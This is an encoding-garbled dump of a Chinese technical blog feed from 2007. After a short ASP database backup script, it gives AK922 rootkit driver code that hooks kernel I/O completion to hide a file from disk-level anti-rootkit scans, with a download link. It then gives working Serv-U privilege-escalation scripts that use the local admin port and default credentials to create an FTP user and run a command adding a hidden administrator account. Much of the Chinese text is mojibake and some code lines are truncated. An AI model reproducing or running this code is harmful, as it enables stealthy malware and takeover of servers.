'SQL Server 鏁版嵁搴撶殑澶囦喚涓庢仮澶?
if request("action")="backupdatabase" Then
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>娌℃湁杈撳叆鏁版嵁搴撳悕縐?</font>"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Action   = 0
bak.Initialize   = 1
'bak.Replace   = True
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>澶囦喚鎴愬姛!</font>"
elseif act="restore" then
'鎭㈠鏃惰鍦ㄦ病鏈変嬌鐢ㄦ暟鎹簱鏃惰繘琛岋紒
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv
Response.write "<font color=green>鎭㈠鎴愬姛!</font>"
else
Response.write "<font color=red>璇烽夋嫨澶囦喚鎴栨仮澶?</font>"
end if
end if
end if
%></td>
</tr>
</table>
</body>
</html>

 



鍙跺瓙 2007-10-22 09:41 鍙戣〃璇勮
]]>AK922: 紿佺牬紓佺洏?shù)綆珩攱個(gè)嫻嬪疄鐜版枃浠墮殣钘?/title><link>http://m.shnenglu.com/elva/archive/2007/10/12/34018.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Fri, 12 Oct 2007 03:58:00 GMT</pubDate><guid>http://m.shnenglu.com/elva/archive/2007/10/12/34018.html</guid><wfw:comment>http://m.shnenglu.com/elva/comments/34018.html</wfw:comment><comments>http://m.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/elva/comments/commentRss/34018.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/elva/services/trackbacks/34018.html</trackback:ping><description><![CDATA[AK922: 紿佺牬紓佺洏?shù)綆珩攱個(gè)嫻嬪疄鐜版枃浠墮殣钘?br>浣滆咃細(xì)Azy<br>email: Azy000@gmail.com<br>瀹屾垚浜庯細(xì)2007-08-08<br><br>   鐩墠錛屼竴浜涘凡鍏紑鐨勪富嫻乤nti-rootkit媯(gè)嫻嬮殣钘忔枃浠朵富瑕佹湁涓ょ鏂規(guī)硶錛氱涓縐嶆槸鏂囦歡緋葷粺灞傜殑媯(gè)嫻嬶紝灞炰簬榪欎竴綾葷殑鏈塱cesword錛宒arkspy錛実mer絳夈傜浜岀渚挎槸紓佺洏綰у埆鐨勪綆綰ф嫻嬶紙Disk Low-Level Scanning錛夛紝灞炰簬榪欎竴綾葷殑ark涔熷緢澶氾紝鍏稿瀷浠h〃涓簉ootkit unhooker錛宖ilereg錛坕s鐨勬彃浠訛級(jí)錛宺ootkit revealer錛宐lacklight絳夈傚綋鐒?dòng)灱寴q樻湁涓浜涘伐鍏鳳紝瀹冧滑鍦ㄥ簲鐢ㄥ眰涓婇氳繃璋冪敤ZwQueryDirectoryFile鏉ュ疄鏂芥嫻嬨?br>   椹卞姩涔熷ソ錛屽簲鐢ㄤ篃緗紝璇寸櫧浜?jiǎn)灏辨槸鐩存帴鎴栭棿鎺ュ彂閫両RP鍒頒笅灞傞┍鍔ㄣ傜涓綾葷殑鍙戦佸埌FSD涓紙fastfat.sys/ntfs.sys錛夛紝絎簩綾昏鍙戦佸埌紓佺洏椹卞姩錛坉isk.sys錛夛紝鑰屽悗IRP渚夸細(xì)鎼哄甫鐩稿簲鐨勬枃浠朵俊鎭繑鍥烇紝榪欐椂涓婂眰搴旂敤鍐嶆牴鎹繑鍥炰俊鎭繘琛屽鐞嗗拰鍒ゆ柇銆備絾鏄敱浜嶥isk綰ф瘮FS綰ф洿搴曞眰錛孖RP榪斿洖緇欐垜浠殑鏄洿鍔犳帴榪戞暟鎹師濮嬬粍緇囨柟寮忕殑紓佺洏鎵囧尯淇℃伅錛屾墍浠ュ湪Disk灞備笂瀹炴柦鏂囦歡媯(gè)嫻嬪彲浠ュ緱鍒版洿浠や漢淇℃湇鐨勭粨鏋溿備絾榪欏茍涓嶇瓑浜庤榪欑被媯(gè)嫻嬩笉鑳借鍑昏觸銆傛湰鏂囧氨灝嗕粙緇嶄竴縐嶇粫榪囪綾繪嫻嬬殑瀹炵幇鏂規(guī)硶錛屽綋鐒?dòng)灱寴q欎篃鏄湪AK922涓嬌鐢ㄧ殑銆?br>   瀵逛簬瑕佸疄鐜版枃浠墮殣钘忕殑RK錛屼笌鍏惰鏄?#8220;緇曡繃”錛岃繕?shù)笉濡傝鏄?#8220;鎷︽埅” -- 鎸傞挬鏌愪簺鍐呮牳鍑芥暟璋冪敤錛屼互渚垮湪榪斿洖涓婂眰涔嬪墠鎴戜滑鏈夋満浼?xì)杩囨护鎺夊緟闅愯棌鏂囦欢鐨勪俊鎭?br>   AK922閲囩敤鐨勬柟娉曟槸Hook鍐呮牳鍑芥暟IofCompleteRequest銆傝繖涓嚱鏁板緢鏈夋剰鎬濓紝鍥犱負(fù)瀹冧笉浠呮槸涓涓嚑涔庡湪浠諱綍椹卞姩涓兘瑕佽皟鐢ㄧ殑鍑芥暟錛岃屼笖鍙傛暟涓濂藉惈鏈塈RP銆傛湁浜?jiǎn)IRP錛屽氨鏈変簡(jiǎn)涓鍒囥傝繖浜涚壒鎬у喅瀹氫簡(jiǎn)瀹冨緢閫傚悎鍋氭垜浠殑“鍌(gè)鍎?#8221;銆備絾鏇撮噸瑕佺殑鏄紝涓鑸湪椹卞姩涓皟鐢↖ofCompleteRequest涔嬫椂IRP鎿嶄綔閮藉凡瀹屾瘯錛孖RP涓浉鍏沖煙宸茬粡濉厖浜?jiǎn)鍐呭锛寴q欏氨渚夸簬鎴戜滑鐫鎵嬬洿鎺ヨ繘琛岃繃婊よ屼笉鐢ㄥ啀鍋氳濡傚彂閫両RP瀹夎瀹屾垚渚嬬▼涔嬬被鐨勬搷浣溿?br>   涓嬮潰灝辯潃閲嶈涓涓嬪伐浣滄祦紼嬶細(xì)<br>   棣栧厛錛屽垽鏂璏ajorFunction鏄笉鏄疘RP_MJ_READ浠ュ強(qiáng)IO鍫嗘爤涓殑DeviceObject鏄惁鏄鐩橀┍鍔ㄧ殑璁懼瀵硅薄錛屽洜涓鴻繖鎵嶆槸鎴戜滑瑕佸鐞嗙殑鏍稿績(jī)IRP錛屾墍鏈塧rk鐩存帴鍙戦佸埌Disk灞傜殑IRP鍦ㄨ繖閲岄兘鍙互琚嫤鎴埌銆?br>   鎺ヤ笅鏉ョ殑澶勭悊瑕佺壒鍒敞鎰忥紝榪涘叆鍒拌繖閲屾椂IRQL鏄湪APC_LEVEL浠ヤ笂鐨勶紝鍥犳鎴戜滑涓嶈兘紕?lì)C換浣旾RP涓殑鐢ㄦ埛妯″紡緙撳啿鍖猴紝涓紕版瀬鏈夊彲鑳借摑錛屼篃灝辨槸璇存垜浠笉鑳界洿鎺ュ鐞嗙浉鍏崇鐩樻墖鍖轟俊鎭紝鑰屽繀欏婚氳繃ExQueueWorkItem鎺掗槦涓涓猈orkItem鐨勬柟娉曟潵澶勭悊銆傞櫎姝や箣澶栵紝鐢變簬Disk灞傚湪璁懼鍫嗘爤涓浜庨潬涓嬬殑浣嶇疆錛屽ぇ閮ㄥ垎IRP鍙戝埌榪欓噷鏃跺綋鍓嶈繘紼嬩笂涓嬫枃鏃╁凡涓嶆槸鍘熷IRP鍙戣搗鑰呯殑榪涚▼涓婁笅鏂囦簡(jiǎn)錛岃繖閲岀殑鍙戣搗鑰呭簲鐞嗚В涓篴rk榪涚▼銆傚垢榪愮殑鏄湪IRP鐨凾ail.Overlay.Thread鍩熶腑榪樹(shù)繚瀛樼潃鍘熷ETHREAD鎸囬拡錛屼負(fù)浜?jiǎn)鎿嶄綔鐢ㄦ堜hā寮忕紦鍐插尯錛屽繀欏昏皟鐢↘eAttachProcess鍒囧埌IRP鍙戣搗鑰呯殑涓婁笅鏂囩幆澧冧腑錛岃岃繖涓伐浣滃彧鑳藉湪澶勪簬PASSIVE_LEVEL綰т笂鐨勫伐浣滆呯嚎紼嬩腑鎵ц銆傚湪DISPATCH_LEVEL綰т笂錛屽仛鐨勪簨瓚婂皯瓚婂ソ銆?br>   鍒氬紑濮嬫垜榪樺垎涓ょ鎯呭喌榪涜澶勭悊錛氬洜涓哄茍涓嶆槸鎵鏈夌殑IRP閮戒笉澶勫湪鍘熷涓婁笅鏂囦腑錛屾瘮濡俰cesword鍙戠殑IRP鍒拌繖閲岃繕鏄鍦╥cesword.exe榪涚▼涓殑錛岃繖鏃舵垜璁や負(fù)鍙互涓嶇敤鎺掗槦宸ヤ綔欏癸紝榪欐牱灝卞彲浠ヨ妭鐪佸緢澶氱郴緇熻祫婧愶紝鎻愰珮榪囨護(hù)鏁堢巼銆備簬鏄垜璇曞浘鍦―ISPATCH_LEVEL綰т笂鐩存帴鎿嶄綔鐢ㄦ埛緙撳啿鍖猴紝浣嗚繖鏍規(guī)湰琛屼笉閫氥傞┍鍔ㄥ緢涓嶇ǔ瀹氾紝涓嶄竴浼?xì)灏辫摑浜?jiǎn)銆傛晠绱㈡ц佽佸疄瀹炲湴鎺掗槦鍘諱簡(jiǎn)錛岀劧鍚庡啀鍒嗘儏鍐靛鐞嗐備唬鐮佸涓嬶細(xì)<br><br>// 澶勭悊Disk Low-Level Scanning<br>if(irpSp->MajorFunction == IRP_MJ_READ && IsDiskDrxDevice(irpSp->DeviceObject) && irpSp->Parameters.Read.Length != 0)<br>{    <br>        <br>    orgnThread = Irp->Tail.Overlay.Thread;<br>    orgnProcess = IoThreadToProcess(orgnThread);<br>        <br>    if(Irp->MdlAddress)<br>    {        <br>        UserBuffer = (PVOID)((ULONG)Irp->MdlAddress->StartVa + Irp->MdlAddress->ByteOffset);<br>            <br>        // UserBuffer蹇呴』鏈夋晥<br>        if(UserBuffer)<br>        {                    <br>            <br>            if(KeGetCurrentIrql() == DISPATCH_LEVEL)<br>            {                    <br>            <br>                RtlZeroMemory(WorkerCtx, sizeof(WORKERCTX));<br>                <br>                WorkerCtx->UserBuffer = UserBuffer;<br>                WorkerCtx->Length = irpSp->Parameters.Read.Length;<br>                WorkerCtx->EProc = orgnProcess;<br>                <br>                ExInitializeWorkItem(&WorkerCtx->WorkItem, WorkerThread, WorkerCtx);<br>                                <br>                ExQueueWorkItem(&WorkerCtx->WorkItem, CriticalWorkQueue);<br>            } <br>        }<br>        <br>    }<br>}<br>  <br><br>   鏉ュ埌宸ヤ綔鑰呯嚎紼嬶紝鍒頒簡(jiǎn)PASSIVE_LEVEL綰т笂錛屽垏鎹笂涓嬫枃涔嬪悗錛屼技涔庡畨鍏ㄥ浜?jiǎn)銆備絾鏄互闃蹭竾涓錛屾搷浣滅敤鎴鋒ā寮忕紦鍐插尯涔嬪墠榪樻槸瑕佽皟鐢≒robeForXxx鍑芥暟鍏堝垽鏂竴涓嬨傜浉鍏充唬鐮佸涓嬶細(xì)<br><br>VOID WorkerThread(PVOID Context)<br>{<br>    KIRQL irql;<br>    PEPROCESS eproc = ((PWORKERCTX)Context)->orgnEProc;<br>    PEPROCESS currProc = ((PWORKERCTX)Context)->currEProc;<br>    //PMDL mdl;<br>        <br><br>    if(((PWORKERCTX)Context)->UserBuffer)<br>    {<br>        if(eproc != currProc)<br>        {<br><br>            KeAttachProcess(eproc);<br><br>            __try{<br>            <br>                // ProbeForWrite must be running <= APC_LEVEL<br>                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);<br>                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);<br>            }<br><br>            __except(EXCEPTION_EXECUTE_HANDLER){<br><br>                //DbgPrint("we can't op the buffer now :-(");<br>                KeDetachProcess();    <br>                return;<br>            }<br>            <br>            KeDetachProcess();    <br>            <br>        }else{<br><br>            __try{<br>            <br>                // ProbeForWrite must be running <= APC_LEVEL<br>                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);<br>                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);<br>            }<br><br>            __except(EXCEPTION_EXECUTE_HANDLER){}<br>        }<br>    <br>    }<br>}<br><br>   鍑嗗宸ヤ綔緇堜簬綆楁槸鍋氬緱宸笉澶氫簡(jiǎn)錛屼笅闈㈠氨寮濮嬬湡姝f秱鏀圭鐩樻墖鍖哄唴瀹逛簡(jiǎn)銆傝繖閲屽皢娑夊強(qiáng)鍒癋AT32鍜孨TFS紓佺洏鏂囦歡緇撴瀯錛屾垜鍏堟妸瑕佺敤鍒扮殑涓昏緇撴瀯鍒楀嚭鏉ワ紝鍏朵綑鐨勫ぇ瀹跺彲浠ュ弬鑰冦奛TFS Documentation銆嬨?br><br>typedef struct _INDEX_HEADER{<br>    UCHAR            magic[4];<br>    USHORT            UpdateSequenceOffset;<br>    USHORT            SizeInWords;<br>    LARGE_INTEGER    LogFileSeqNumber;<br>    LARGE_INTEGER    VCN;<br>    ULONG            IndexEntryOffset;    // needed!<br>    ULONG            IndexEntrySize;<br>    ULONG            AllocateSize;<br>}INDEX_HEADER, *PINDEX_HEADER;<br><br><br>typedef struct _INDEX_ENTRY{<br>    LARGE_INTEGER        MFTReference;<br>    USHORT            Size;                // needed!<br>    USHORT            FileNameOffset;<br>    USHORT            Flags;<br>    USHORT            Padding;<br>    LARGE_INTEGER        MFTReferParent;<br>    LARGE_INTEGER        CreationTime;<br>    LARGE_INTEGER        ModifyTime;<br>    LARGE_INTEGER        FileRecModifyTime;<br>    LARGE_INTEGER        AccessTime;<br>    LARGE_INTEGER        AllocateSize;<br>    LARGE_INTEGER        RealSize;<br>    LARGE_INTEGER        FileFlags;<br>    UCHAR            FileNameLength;<br>    UCHAR            NameSpace;<br>    WCHAR            FileName[1];<br>}INDEX_ENTRY, *PINDEX_ENTRY;<br><br>   鍦ㄨ鍙栫鐩樻枃浠朵俊鎭椂姣忔閮芥槸浠ヤ竴涓墖鍖哄ぇ灝忥紙512 bytes錛夌殑鏁存暟鍊嶈繘琛岀殑錛屽鏋滀笉浜?jiǎn)瑙g浉搴斿嶏L(fēng)殑緇勭粐褰㈠紡鍜屾暟鎹粨鏋勶紝閭d箞鎰熻灝辨槸鏁版嵁澶氳岀箒鏉傦紝鎼滅儲(chǔ)鏁堢巼涔熷緢浣庛備絾杈呬互涓婅堪緇撴瀯渚垮彲蹇熷畾浣嶅緟闅愯棌鏂囦歡騫惰繘琛屾秱鏀廣傝繖閲屼笉寰椾笉璇翠竴鍙ワ紝綆楁硶鐨勯珮鏁堟槸寰堥噸瑕佺殑錛屽鏋滈噰鐢ㄦ毚鍔涙悳绱㈢殑鏂瑰紡錛岄偅涔堢郴緇烞SOD鐨勬鐜囦細(xì)澶уぇ澧炲姞銆?br>   鍦‵AT32鍗蜂笂錛屽綋AK922鎼滅儲(chǔ)鍒版枃浠禔K922.sys鐨勭洰褰曢」鏃訛紝灝嗗叾0x0鍋忕Щ澶勭殑鏂囦歡鍚嶇殑絎竴涓瓧鑺傜疆涓?0xe5"錛屽嵆鏍囪涓哄垹闄ゃ傝繖鏍峰嵆鍙揪鍒版楠梐rk鐨勭洰鐨勩備絾涓轟簡(jiǎn)鏇村姞闅愯斀錛屼笉璁﹚inhex瀵熻鍑烘潵錛屾渶濂芥妸鏂囦歡鍚嶅叏閮ㄦ竻0銆?br>   澶勭悊NTFS鍗風(fēng)◢寰夯鐑?chǔ)浜涘Q屾枃浠惰褰曞拰绱㈠紩欏歸兘瑕佹姽騫插噣錛屽叿浣撳疄鐜拌浠g爜錛岃繖閲屼笉鍐嶈禈榪般?br><br>VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen)<br>{<br>    ULONG i;<br>    BOOLEAN bIsNtfsIndex;<br>    BOOLEAN bIsNtfsFile;<br>    ULONG offset = 0;<br>    ULONG indexSize = 0;<br>    PINDEX_ENTRY currIndxEntry = NULL;<br>    PINDEX_ENTRY preIndxEntry = NULL;<br>    ULONG currPosition;<br><br>    <br>    bIsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0);<br>    bIsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0);<br><br>    if(bIsNtfsFile == FALSE && bIsNtfsIndex == FALSE)<br>    {            <br>    <br>        for(i = 0; i < BufLen/0x20; i++)<br>        {<br>            if(!_strnicmp(UserBuf, fileHide, 5) && !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3))<br>            {<br><br>                *(PUCHAR)UserBuf        = 0xe5;<br>                *(PULONG)((ULONG)UserBuf + 0x1)    = 0;<br><br>                break;<br>                    <br>            }<br><br>            UserBuf = (PVOID)((ULONG)UserBuf + 0x20);<br>        <br>        }<br><br>    } else if(bIsNtfsFile) {<br><br>        //DbgPrint("FILE0...");<br><br>        for(i = 0; i < BufLen / FILERECORDSIZE; i++)<br>        {<br>            if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9))<br>            {<br>                memset((PVOID)UserBuf, 0, 0x4);<br>                memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18);<br>                break;<br>            }<br>                <br>            UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE);<br>                <br>        }<br>            <br>    } else if(bIsNtfsIndex) {<br>                            <br>        //DbgPrint("INDX...");<br>        // Index Entries<br>        <br>        offset = ((PINDEX_HEADER)UserBuf)->IndexEntryOffset + 0x18;<br>        indexSize = BufLen - offset;<br>        currPosition = 0;<br><br>        currIndxEntry = (PINDEX_ENTRY)((ULONG)UserBuf + offset);<br>        //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize);<br>                <br>        while(currPosition < indexSize && currIndxEntry->Size > 0 && currIndxEntry->FileNameOffset > 0)<br>        {<br>            if(!_wcsnicmp(currIndxEntry->FileName, hideFile, 9))<br>            {<br>                memset((PVOID)currIndxEntry->FileName, 0, 18);<br><br>                if(currPosition == 0)<br>                {<br>                    ((PINDEX_HEADER)UserBuf)->IndexEntryOffset += currIndxEntry->Size;<br>                    break;<br>                }<br><br>                preIndxEntry->Size += currIndxEntry->Size;<br>                <br>                break;<br>            }<br><br>            currPosition += currIndxEntry->Size;<br>            preIndxEntry = currIndxEntry;<br>            currIndxEntry = (PINDEX_ENTRY)((ULONG)currIndxEntry + currIndxEntry->Size);<br>                    <br>        }<br>    }<br>}<br><br>   姘村鉤鏈夐檺錛屾榪庡ぇ瀹朵笌鎴戜氦嫻併?br><br><br>鍙傝冭祫鏂欙細(xì)<br><br>[1] - 銆奛TFS Documentation銆?br>[2] - Azy錛屻奍ceSword & Rootkit Unhooker椹卞姩綆鏋愩?br><br>---------<br><br>鍏充簬AK922(AzyKit)錛氭垜鍐欑殑涓涓彧瀹炵幇鏂囦歡闅愯棌鐨凴K錛屽彲浠ypass鏈枃鎻愬埌鐨勬墍鏈塧rk銆?br>Download @ <a target=_blank><u><font color=#0000ff>http://www.wiiupload.net/sf/65b4e75ec4</font></u></a> <img src ="http://m.shnenglu.com/elva/aggbug/34018.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-10-12 11:58 <a href="http://m.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>鍒嗕韓serv-u鍒╃敤鑴氭湰(asp/aspx/php/perl)http://m.shnenglu.com/elva/archive/2007/08/04/29350.html鍙跺瓙鍙跺瓙Sat, 04 Aug 2007 07:17:00 GMThttp://m.shnenglu.com/elva/archive/2007/08/04/29350.htmlhttp://m.shnenglu.com/elva/comments/29350.htmlhttp://m.shnenglu.com/elva/archive/2007/08/04/29350.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/29350.htmlhttp://m.shnenglu.com/elva/services/trackbacks/29350.htmlASP


<%
'Serv-U asp 鎻愭潈紼嬪簭
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if  not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
    set a=Server.CreateObject("Microsoft.XMLHTTP")
    a.open "GET", "    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
    set session("a")=a
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>姝e湪榪炴帴 127.0.0.1:<%=port%>,浣跨敤鐢ㄦ埛鍚? <%=user%>,鍙d護(hù)錛?lt;%=pass%>...<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 2
    set b=Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "    b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>姝e湪鎻愬崌鏉冮檺,璇風(fēng)瓑寰?..,<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 3
    set c=Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "    c.send loginuser & loginpass & mt & deldomain & quit
    set session("c")=c
%>
<center>鎻愭潈瀹屾瘯,宸叉墽琛屼簡(jiǎn)鍛戒護(hù)錛?lt;br><font color=red><%=cmd%></font><br><br>
<input type=button value=" 榪斿洖緇х畫 " onClick="location.href='<%=gname()%>';">
</center>
<%
case else
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>
<center><form method="post" name="goldsun">
<table width="494" height="163" border="1" cellpadding="0" cellspacing="1" bordercolor="#666666">
  <tr align="center" valign="middle">
    <td colspan="2">Serv-U 鎻愬崌鏉冮檺 ASP鐗?Goldsun[at]84823714</td>
  </tr>
  <tr align="center" valign="middle">
    <td width="100">鐢ㄦ埛鍚?</td>
    <td width="379"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>鍙c浠わ細(xì)</td>
    <td><input name="p" type="text" id="p" value=" #l@$ak#.lk;0@P"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>绔鍙o細(xì)</td>
    <td><input name="port" type="text" id="port" value="43958"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>緋葷粺璺緞錛?lt;/td>
    <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>鍛姐浠わ細(xì)</td>
    <td><input name="c" type="text" id="c" value="cmd /c net user goldsun love /add & net localgroup administrators goldsun /add" size="50"></td>
  </tr>
 
  <tr align="center" valign="middle">
    <td colspan="2"><input type="submit" name="Submit" value="鎻愪氦">銆
      <input type="reset" name="Submit2" value="閲嶇疆">
      <input name="action" type="hidden" id="action" value="1"></td>
  </tr>
</table></form></center>
<% end select
function Gpath()
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
 gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>


ASPX


<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

'
' Love, where are you ?

Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text

Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-deleteDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

'Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
Dim tcpClient2 As New TcpClient()
Try
